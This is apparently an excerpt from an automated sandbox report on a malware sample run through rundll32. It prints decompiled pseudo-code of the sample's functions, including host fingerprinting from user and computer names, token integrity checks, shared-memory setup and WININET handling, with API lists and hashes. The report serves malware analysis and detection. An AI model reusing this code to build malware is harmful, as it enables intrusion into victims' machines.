                    • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04447B6B
                    • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04447B7B
                    • GetLastError.KERNEL32 ref: 04447B85
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                    • String ID:
                    • API String ID: 2290446683-0
                    • Opcode ID: c03671a4f52eb684bab4647bdcfeb7c2544d011f6792037382d75199f76d9a97
                    • Instruction ID: 11934ccea9e4fb2295761fdde99c3e9a83ec9902fac42f3cc89477a5e1a6342b
                    • Opcode Fuzzy Hash: c03671a4f52eb684bab4647bdcfeb7c2544d011f6792037382d75199f76d9a97
                    • Instruction Fuzzy Hash: 49417C75500644BBFB319FA5DC89EABBBBDEFC5704F10492AF102E1191E738A945DB20
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 189 4447e75-4447eda 190 4447edc-4447ef6 RaiseException 189->190 191 4447efb-4447f25 189->191 192 44480ab-44480af 190->192 193 4447f27 191->193 194 4447f2a-4447f36 191->194 193->194 195 4447f38-4447f43 194->195 196 4447f49-4447f4b 194->196 195->196 204 444808e-4448095 195->204 197 4447f51-4447f58 196->197 198 4447ff3-4447ffd 196->198 202 4447f68-4447f75 LoadLibraryA 197->202 203 4447f5a-4447f66 197->203 200 4447fff-4448007 198->200 201 4448009-444800b 198->201 200->201 205 444800d-4448010 201->205 206 4448089-444808c 201->206 207 4447f77-4447f87 GetLastError 202->207 208 4447fb8-4447fc4 InterlockedExchange 202->208 203->202 203->208 210 4448097-44480a4 204->210 211 44480a9 204->211 213 4448012-4448015 205->213 214 444803e-444804c GetProcAddress 205->214 206->204 215 4447f97-4447fb3 RaiseException 207->215 216 4447f89-4447f95 207->216 217 4447fc6-4447fca 208->217 218 4447fec-4447fed FreeLibrary 208->218 210->211 211->192 213->214 219 4448017-4448022 213->219 214->206 220 444804e-444805e GetLastError 214->220 215->192 216->208 216->215 217->198 221 4447fcc-4447fd8 LocalAlloc 217->221 218->198 219->214 223 4448024-444802a 219->223 225 4448060-4448068 220->225 226 444806a-444806c 220->226 221->198 222 4447fda-4447fea 221->222 222->198 223->214 228 444802c-444802f 223->228 225->226 226->206 227 444806e-4448086 RaiseException 226->227 227->206 228->214 230 4448031-444803c 228->230 230->206 230->214
                    C-Code - Quality: 51%
                    			E04447E75(long _a4, long _a8) {
                    				signed int _v8;
                    				intOrPtr _v16;
                    				LONG* _v28;
                    				long _v40;
                    				long _v44;
                    				long _v48;
                    				CHAR* _v52;
                    				long _v56;
                    				CHAR* _v60;
                    				long _v64;
                    				signed int* _v68;
                    				char _v72;
                    				signed int _t76;
                    				signed int _t80;
                    				signed int _t81;
                    				intOrPtr* _t82;
                    				intOrPtr* _t83;
                    				intOrPtr* _t85;
                    				intOrPtr* _t90;
                    				intOrPtr* _t95;
                    				intOrPtr* _t98;
                    				struct HINSTANCE__* _t99;
                    				void* _t102;
                    				intOrPtr* _t104;
                    				void* _t115;
                    				long _t116;
                    				void _t125;
                    				void* _t131;
                    				signed short _t133;
                    				struct HINSTANCE__* _t138;
                    				signed int* _t139;
                    
                    				_t139 = _a4;
                    				_v28 = _t139[2] + 0x4440000;
                    				_t115 = _t139[3] + 0x4440000;
                    				_t131 = _t139[4] + 0x4440000;
                    				_v8 = _t139[7];
                    				_v60 = _t139[1] + 0x4440000;
                    				_v16 = _t139[5] + 0x4440000;
                    				_v64 = _a8;
                    				_v72 = 0x24;
                    				_v68 = _t139;
                    				_v56 = 0;
                    				asm("stosd");
                    				_v48 = 0;
                    				_v44 = 0;
                    				_v40 = 0;
                    				if(( *_t139 & 0x00000001) == 0) {
                    					_a8 =  &_v72;
                    					RaiseException(0xc06d0057, 0, 1,  &_a8);
                    					return 0;
                    				}
                    				_t138 =  *_v28;
                    				_t76 = _a8 - _t115 >> 2 << 2;
                    				_t133 =  *(_t131 + _t76);
                    				_a4 = _t76;
                    				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                    				_v56 = _t80;
                    				_t81 = _t133 + 0x4440002;
                    				if(_t80 == 0) {
                    					_t81 = _t133 & 0x0000ffff;
                    				}
                    				_v52 = _t81;
                    				_t82 =  *0x444a1c0; // 0x0
                    				_t116 = 0;
                    				if(_t82 == 0) {
                    					L6:
                    					if(_t138 != 0) {
                    						L18:
                    						_t83 =  *0x444a1c0; // 0x0
                    						_v48 = _t138;
                    						if(_t83 != 0) {
                    							_t116 =  *_t83(2,  &_v72);
                    						}
                    						if(_t116 != 0) {
                    							L32:
                    							 *_a8 = _t116;
                    							L33:
                    							_t85 =  *0x444a1c0; // 0x0
                    							if(_t85 != 0) {
                    								_v40 = _v40 & 0x00000000;
                    								_v48 = _t138;
                    								_v44 = _t116;
                    								 *_t85(5,  &_v72);
                    							}
                    							return _t116;
                    						} else {
                    							if(_t139[5] == _t116 || _t139[7] == _t116) {
                    								L27:
                    								_t116 = GetProcAddress(_t138, _v52);
                    								if(_t116 == 0) {
                    									_v40 = GetLastError();
                    									_t90 =  *0x444a1bc; // 0x0
                    									if(_t90 != 0) {
                    										_t116 =  *_t90(4,  &_v72);
                    									}
                    									if(_t116 == 0) {
                    										_a4 =  &_v72;
                    										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                    										_t116 = _v44;
                    									}
                    								}
                    								goto L32;
                    							} else {
                    								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                    								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                    									_t116 =  *(_a4 + _v16);
                    									if(_t116 != 0) {
                    										goto L32;
                    									}
                    								}
                    								goto L27;
                    							}
                    						}
                    					}
                    					_t98 =  *0x444a1c0; // 0x0
                    					if(_t98 == 0) {
                    						L9:
                    						_t99 = LoadLibraryA(_v60); // executed
                    						_t138 = _t99;
                    						if(_t138 != 0) {
                    							L13:
                    							if(InterlockedExchange(_v28, _t138) == _t138) {
                    								FreeLibrary(_t138);
                    							} else {
                    								if(_t139[6] != 0) {
                    									_t102 = LocalAlloc(0x40, 8);
                    									if(_t102 != 0) {
                    										 *(_t102 + 4) = _t139;
                    										_t125 =  *0x444a1b8; // 0x0
                    										 *_t102 = _t125;
                    										 *0x444a1b8 = _t102;
                    									}
                    								}
                    							}
                    							goto L18;
                    						}
                    						_v40 = GetLastError();
                    						_t104 =  *0x444a1bc; // 0x0
                    						if(_t104 == 0) {
                    							L12:
                    							_a8 =  &_v72;
                    							RaiseException(0xc06d007e, 0, 1,  &_a8);
                    							return _v44;
                    						}
                    						_t138 =  *_t104(3,  &_v72);
                    						if(_t138 != 0) {
                    							goto L13;
                    						}
                    						goto L12;
                    					}
                    					_t138 =  *_t98(1,  &_v72);
                    					if(_t138 != 0) {
                    						goto L13;
                    					}
                    					goto L9;
                    				}
                    				_t116 =  *_t82(0,  &_v72);
                    				if(_t116 != 0) {
                    					goto L33;
                    				}
                    				goto L6;
                    			}

                    APIs
                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04447EEE
                    • LoadLibraryA.KERNEL32(?), ref: 04447F6B
                    • GetLastError.KERNEL32 ref: 04447F77
                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04447FAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                    • String ID: $
                    • API String ID: 948315288-3993045852
                    • Opcode ID: a21c03958c6aa8e204193650e7c3076051f456d93cd29217643d8b6932fca305
                    • Instruction ID: 09e570da70c3c0efc570891ed67381d63c0016a7675679100d5b75f88e3d6b27
                    • Opcode Fuzzy Hash: a21c03958c6aa8e204193650e7c3076051f456d93cd29217643d8b6932fca305
                    • Instruction Fuzzy Hash: 37814275A006059FEF21DFA8D880A9EB7F5FF88310F15812AE505E7340EB74E945CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 96%
                    			E044421BC(char __eax, signed int* __esi) {
                    				long _v8;
                    				char _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v28;
                    				long _t34;
                    				signed int _t39;
                    				long _t50;
                    				char _t59;
                    				intOrPtr _t61;
                    				void* _t62;
                    				void* _t63;
                    				signed int* _t64;
                    				char _t65;
                    				intOrPtr* _t67;
                    				void* _t68;
                    				signed int* _t69;
                    
                    				_t69 = __esi;
                    				_t65 = __eax;
                    				_v8 = 0;
                    				_v12 = __eax;
                    				if(__eax == 0) {
                    					_t59 =  *0x444a310; // 0xd448b889
                    					_v12 = _t59;
                    				}
                    				_t64 = _t69;
                    				E04445894( &_v12, _t64);
                    				if(_t65 != 0) {
                    					 *_t69 =  *_t69 ^  *0x444a31c ^ 0x46d76429;
                    				} else {
                    					GetUserNameW(0,  &_v8); // executed
                    					_t50 = _v8;
                    					if(_t50 != 0) {
                    						_t62 = RtlAllocateHeap( *0x444a2d8, 0, _t50 + _t50);
                    						if(_t62 != 0) {
                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                    								_t63 = _t62;
                    								 *_t69 =  *_t69 ^ E044452A9(_v8 + _v8, _t63);
                    							}
                    							HeapFree( *0x444a2d8, 0, _t62);
                    						}
                    					}
                    				}
                    				_t61 = __imp__;
                    				_v8 = _v8 & 0x00000000;
                    				GetComputerNameW(0,  &_v8);
                    				_t34 = _v8;
                    				if(_t34 != 0) {
                    					_t68 = RtlAllocateHeap( *0x444a2d8, 0, _t34 + _t34);
                    					if(_t68 != 0) {
                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                    							_t63 = _t68;
                    							_t69[3] = _t69[3] ^ E044452A9(_v8 + _v8, _t63);
                    						}
                    						HeapFree( *0x444a2d8, 0, _t68);
                    					}
                    				}
                    				asm("cpuid");
                    				_t67 =  &_v28;
                    				 *_t67 = 1;
                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                    				 *(_t67 + 8) = _t63;
                    				 *(_t67 + 0xc) = _t64;
                    				_t39 = _v16 ^ _v20 ^ _v28;
                    				_t69[1] = _t69[1] ^ _t39;
                    				return _t39;
                    			}

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 044421F3
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 0444220A
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04442217
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04442238
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0444225F
                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04442273
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04442280
                    • HeapFree.KERNEL32(00000000,00000000), ref: 0444229E
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: HeapName$AllocateComputerFreeUser
                    • String ID: Ut
                    • API String ID: 3239747167-8415677
                    • Opcode ID: 2bc87585f0d91027e87e9e4c4d9e8524cedefaa5e7fa73c9e818b63b7a7ddeb4
                    • Instruction ID: 893767bd8158f273a96c5ca2921509fafd0a7d9d21583e7ebeff425e6c42d01c
                    • Opcode Fuzzy Hash: 2bc87585f0d91027e87e9e4c4d9e8524cedefaa5e7fa73c9e818b63b7a7ddeb4
                    • Instruction Fuzzy Hash: C0312475A00209EFEB10DFA9DC81A6EF7F9FB88350F10446AE505E3650EB74EE45AB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 74%
                    			E0444414A(intOrPtr __edx, void** _a4, void** _a8) {
                    				intOrPtr _v8;
                    				struct _FILETIME* _v12;
                    				short _v56;
                    				struct _FILETIME* _t12;
                    				intOrPtr _t13;
                    				void* _t17;
                    				void* _t21;
                    				intOrPtr _t27;
                    				long _t28;
                    				void* _t30;
                    
                    				_t27 = __edx;
                    				_t12 =  &_v12;
                    				GetSystemTimeAsFileTime(_t12);
                    				_push(0x192);
                    				_push(0x54d38000);
                    				_push(_v8);
                    				_push(_v12);
                    				L04448184();
                    				_push(_t12);
                    				_v12 = _t12;
                    				_t13 =  *0x444a320; // 0xafd5a8
                    				_t5 = _t13 + 0x444b87e; // 0x4f48e26
                    				_t6 = _t13 + 0x444b59c; // 0x530025
                    				_push(0x16);
                    				_push( &_v56);
                    				_v8 = _t27;
                    				L04447DEA();
                    				_t17 = CreateFileMappingW(0xffffffff, 0x444a34c, 4, 0, 0x1000,  &_v56); // executed
                    				_t30 = _t17;
                    				if(_t30 == 0) {
                    					_t28 = GetLastError();
                    				} else {
                    					if(GetLastError() == 0xb7) {
                    						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                    						if(_t21 == 0) {
                    							_t28 = GetLastError();
                    							if(_t28 != 0) {
                    								goto L6;
                    							}
                    						} else {
                    							 *_a4 = _t30;
                    							 *_a8 = _t21;
                    							_t28 = 0;
                    						}
                    					} else {
                    						_t28 = 2;
                    						L6:
                    						CloseHandle(_t30);
                    					}
                    				}
                    				return _t28;
                    			}

                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,044465C3,?,?,4D283A53,?,?), ref: 04444156
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0444416C
                    • _snwprintf.NTDLL ref: 04444191
                    • CreateFileMappingW.KERNELBASE(000000FF,0444A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 044441AD
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044465C3,?,?,4D283A53,?), ref: 044441BF
                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 044441D6
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,044465C3,?,?,4D283A53), ref: 044441F7
                    • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044465C3,?,?,4D283A53,?), ref: 044441FF
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID:
                    • API String ID: 1814172918-0
                    • Opcode ID: 766199c23f02842cdc30013b59085564dc162b598661e2a661b826977cfb6625
                    • Instruction ID: 6caa28c3c2a5667cc0bd5b55a02f01cffa90e4397b6d02452d4f65c98851d879
                    • Opcode Fuzzy Hash: 766199c23f02842cdc30013b59085564dc162b598661e2a661b826977cfb6625
                    • Instruction Fuzzy Hash: F621A2B6640214BBFB21AB64CC05F9B77B9EBC8754F240126FA05E7280EB70E906DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 93%
                    			E04445622(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                    				void* _t17;
                    				void* _t18;
                    				void* _t19;
                    				void* _t20;
                    				void* _t21;
                    				intOrPtr _t24;
                    				void* _t37;
                    				void* _t41;
                    				intOrPtr* _t45;
                    
                    				_t41 = __edi;
                    				_t37 = __ebx;
                    				_t45 = __eax;
                    				_t16 =  *((intOrPtr*)(__eax + 0x20));
                    				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                    					E04445867(_t16, __ecx, 0xea60);
                    				}
                    				_t17 =  *(_t45 + 0x18);
                    				_push(_t37);
                    				_push(_t41);
                    				if(_t17 != 0) {
                    					InternetSetStatusCallback(_t17, 0);
                    					InternetCloseHandle( *(_t45 + 0x18)); // executed
                    				}
                    				_t18 =  *(_t45 + 0x14);
                    				if(_t18 != 0) {
                    					InternetSetStatusCallback(_t18, 0);
                    					InternetCloseHandle( *(_t45 + 0x14));
                    				}
                    				_t19 =  *(_t45 + 0x10);
                    				if(_t19 != 0) {
                    					InternetSetStatusCallback(_t19, 0);
                    					InternetCloseHandle( *(_t45 + 0x10));
                    				}
                    				_t20 =  *(_t45 + 0x1c);
                    				if(_t20 != 0) {
                    					CloseHandle(_t20);
                    				}
                    				_t21 =  *(_t45 + 0x20);
                    				if(_t21 != 0) {
                    					CloseHandle(_t21);
                    				}
                    				_t22 =  *((intOrPtr*)(_t45 + 8));
                    				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                    					E044417AB(_t22);
                    					 *((intOrPtr*)(_t45 + 8)) = 0;
                    					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                    				}
                    				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                    				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                    					E044417AB(_t23);
                    				}
                    				_t24 =  *_t45;
                    				if(_t24 != 0) {
                    					_t24 = E044417AB(_t24);
                    				}
                    				_t46 =  *((intOrPtr*)(_t45 + 4));
                    				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                    					return E044417AB(_t46);
                    				}
                    				return _t24;
                    			}

                    APIs
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04445650
                    • InternetCloseHandle.WININET(?), ref: 04445655
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04445660
                    • InternetCloseHandle.WININET(?), ref: 04445665
                    • InternetSetStatusCallback.WININET(?,00000000), ref: 04445670
                    • InternetCloseHandle.WININET(?), ref: 04445675
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04441B44,?,?,00000000,00000000,74E481D0), ref: 04445685
                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04441B44,?,?,00000000,00000000,74E481D0), ref: 0444568F
                      • Part of subcall function 04445867: WaitForMultipleObjects.KERNEL32(00000002,04447AF8,00000000,04447AF8,?,?,?,04447AF8,0000EA60), ref: 04445882
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                    • String ID:
                    • API String ID: 2824497044-0
                    • Opcode ID: 6ed40086ca2654cc2d38b49f3c1f9b3c8cec32df1f4250f87d6b301fbdcdd726
                    • Instruction ID: 30b769fe48036c89f6db11b6b6c6790f2b0a36bbf49fbfa752b86ea94528e99e
                    • Opcode Fuzzy Hash: 6ed40086ca2654cc2d38b49f3c1f9b3c8cec32df1f4250f87d6b301fbdcdd726
                    • Instruction Fuzzy Hash: 37110D756007486BEE70AFAAEC84C1BB7F9ABC53843550D1EE18AD3610C735FC848A68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E044413CF(long* _a4) {
                    				long _v8;
                    				void* _v12;
                    				void _v16;
                    				long _v20;
                    				int _t33;
                    				void* _t46;
                    
                    				_v16 = 1;
                    				_v20 = 0x2000;
                    				if( *0x444a2fc > 5) {
                    					_v16 = 0;
                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                    						_v8 = 0;
                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                    						if(_v8 != 0) {
                    							_t46 = E044463FD(_v8);
                    							if(_t46 != 0) {
                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                    								if(_t33 != 0) {
                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                    								}
                    								E044417AB(_t46);
                    							}
                    						}
                    						CloseHandle(_v12);
                    					}
                    				}
                    				 *_a4 = _v20;
                    				return _v16;
                    			}

                    APIs
                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04441401
                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04441421
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04441431
                    • CloseHandle.KERNEL32(00000000), ref: 04441481
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04441454
                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0444145C
                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0444146C
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                    • String ID:
                    • API String ID: 1295030180-0
                    • Opcode ID: 4cae2a2fcd4650d000b85ee693f5d86b4d1e07d1a4030958e0c39eff6c8b2085
                    • Instruction ID: aa9be285609e69990672221de617b7ea3a262591e66d35718125a98908a883aa
                    • Opcode Fuzzy Hash: 4cae2a2fcd4650d000b85ee693f5d86b4d1e07d1a4030958e0c39eff6c8b2085
                    • Instruction Fuzzy Hash: 1A213C79900209FFFF009FA4DC49EEEBBB9EB84304F0040A6E510A6251C7755E44EB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 64%
                    			E044418BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				intOrPtr _v8;
                    				intOrPtr _t9;
                    				intOrPtr _t13;
                    				char* _t19;
                    				char* _t28;
                    				void* _t33;
                    				void* _t34;
                    				char* _t36;
                    				void* _t38;
                    				intOrPtr* _t39;
                    				char* _t40;
                    				char* _t42;
                    				char* _t43;
                    
                    				_t34 = __edx;
                    				_push(__ecx);
                    				_t9 =  *0x444a320; // 0xafd5a8
                    				_t1 = _t9 + 0x444b62c; // 0x253d7325
                    				_t36 = 0;
                    				_t28 = E044461A7(__ecx, _t1);
                    				if(_t28 != 0) {
                    					_t39 = __imp__;
                    					_t13 =  *_t39(_t28, _t38);
                    					_v8 = _t13;
                    					_t40 = E044463FD(_v8 +  *_t39(_a4) + 1);
                    					if(_t40 != 0) {
                    						strcpy(_t40, _t28);
                    						_pop(_t33);
                    						__imp__(_t40, _a4);
                    						_t19 = E04447885(_t33, _t34, _t40, _a8); // executed
                    						_t36 = _t19;
                    						E044417AB(_t40);
                    						_t42 = E04446863(StrTrimA(_t36, "="), _t36);
                    						if(_t42 != 0) {
                    							E044417AB(_t36);
                    							_t36 = _t42;
                    						}
                    						_t43 = E04445ACD(_t36, _t33);
                    						if(_t43 != 0) {
                    							E044417AB(_t36);
                    							_t36 = _t43;
                    						}
                    					}
                    					E044417AB(_t28);
                    				}
                    				return _t36;
                    			}

                    APIs
                      • Part of subcall function 044461A7: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,044418D3,253D7325,00000000,7691C740,?,?,04446ABB,?,04F495B0), ref: 0444620E
                      • Part of subcall function 044461A7: sprintf.NTDLL ref: 0444622F
                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04446ABB,?,04F495B0), ref: 044418E5
                    • lstrlen.KERNEL32(?,?,?,04446ABB,?,04F495B0), ref: 044418ED
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • strcpy.NTDLL ref: 04441904
                    • lstrcat.KERNEL32(00000000,?), ref: 0444190F
                      • Part of subcall function 04447885: lstrlen.KERNEL32(?,?,?,00000000,?,0444191E,00000000,?,?,?,04446ABB,?,04F495B0), ref: 04447896
                      • Part of subcall function 044417AB: HeapFree.KERNEL32(00000000,00000000,04442976,00000000,?,?,00000000), ref: 044417B7
                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04446ABB,?,04F495B0), ref: 0444192C
                      • Part of subcall function 04446863: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04441938,00000000,?,?,04446ABB,?,04F495B0), ref: 0444686D
                      • Part of subcall function 04446863: _snprintf.NTDLL ref: 044468CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                    • String ID: =
                    • API String ID: 2864389247-1428090586
                    • Opcode ID: 14ea584244668112131bac633404378b3e0bc67423e01df3bcb845c2cc63297c
                    • Instruction ID: 4b7a94fed2eb8997cc09e74a3e722dc4cbf4af39fdcf167d7a11cc352250ffab
                    • Opcode Fuzzy Hash: 14ea584244668112131bac633404378b3e0bc67423e01df3bcb845c2cc63297c
                    • Instruction Fuzzy Hash: 0811C67B90152577BF127BB69C88C6F36BD9EC56A8309011BF501A7202DF38ED4297A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 341 4441e51-4441e9d SysAllocString 342 4441fc1-4441fc4 341->342 343 4441ea3-4441ecf 341->343 344 4441fc6-4441fc9 SafeArrayDestroy 342->344 345 4441fcf-4441fd2 342->345 349 4441ed5-4441ee1 call 44456cf 343->349 350 4441fbe 343->350 344->345 347 4441fd4-4441fd7 SysFreeString 345->347 348 4441fdd-4441fe4 345->348 347->348 349->350 353 4441ee7-4441ef7 349->353 350->342 353->350 355 4441efd-4441f23 IUnknown_QueryInterface_Proxy 353->355 355->350 357 4441f29-4441f3d 355->357 359 4441f3f-4441f42 357->359 360 4441f7b-4441f7e 357->360 359->360 363 4441f44-4441f5b StrStrIW 359->363 361 4441fb5-4441fba 360->361 362 4441f80-4441f85 360->362 361->350 362->361 364 4441f87-4441f92 call 44457a8 362->364 365 4441f72-4441f75 SysFreeString 363->365 366 4441f5d-4441f66 call 4443d67 363->366 369 4441f97-4441f9b 364->369 365->360 366->365 372 4441f68-4441f70 call 44456cf 366->372 369->361 371 4441f9d-4441fa2 369->371 373 4441fa4-4441fae 371->373 374 4441fb0 371->374 372->365 373->361 374->361
                    APIs
                    • SysAllocString.OLEAUT32(?), ref: 04441E92
                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04441F14
                    • StrStrIW.SHLWAPI(?,006E0069), ref: 04441F53
                    • SysFreeString.OLEAUT32(?), ref: 04441F75
                      • Part of subcall function 04443D67: SysAllocString.OLEAUT32(04449290), ref: 04443DB7
